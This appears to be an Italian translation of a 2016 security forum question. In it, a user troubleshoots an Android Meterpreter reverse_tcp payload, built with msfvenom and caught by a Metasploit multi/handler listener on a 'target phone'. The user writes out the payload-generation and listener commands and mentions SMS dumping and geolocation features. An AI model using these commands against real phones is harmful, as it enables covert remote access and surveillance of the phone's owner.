Metasploit Android carico utile problema

0

Ho generato payload android di reverse_tcp usando msfvenom.

msfvenom -p android/meterpreter/reverse_tcp LHOST=ip R > location

E ho impostato un listener nel mio msfconsole.

use multi/handler
set payload android/mterpreter/reverse_tcp
exploit

Quando eseguo l'APK sul telefono target mi ricollega, ma quando digito le opzioni non ottengo nessuna delle funzionalità di Android. Nessuna geolocalizzazione, dump_sms, ecc. Solo quelli predefiniti. Anche il carico utile è di 8.3Kb quando generato su Manjaro e 9.1Kb in Kali, quindi manca qualcosa.

Sto usando Manjaro e ho installato metasploit con la loro gestione dei pacchetti "pacman", metasploit è la versione 4.12.qualcosa.

Ho fatto lo stesso "hack" ieri dalla mia macchina Kali e tutto funzionava perfettamente, ma non riesco a farlo funzionare da Manjaro e mi sta facendo impazzire. Qualcuno ha un'idea?

EDIT: Non posso credere di non averlo visto. Il telefono target era in modalità Stamina, che probabilmente stava uccidendo la sessione immediatamente, senza nemmeno darmi la possibilità di digitare aiuto e vedere i comandi. Una volta disattivata la modalità Stamina, tutto funziona come prima.

    
posta Dimitrije Spasojević 05.11.2016 - 20:03
fonte

0 risposte

Leggi altre domande sui tag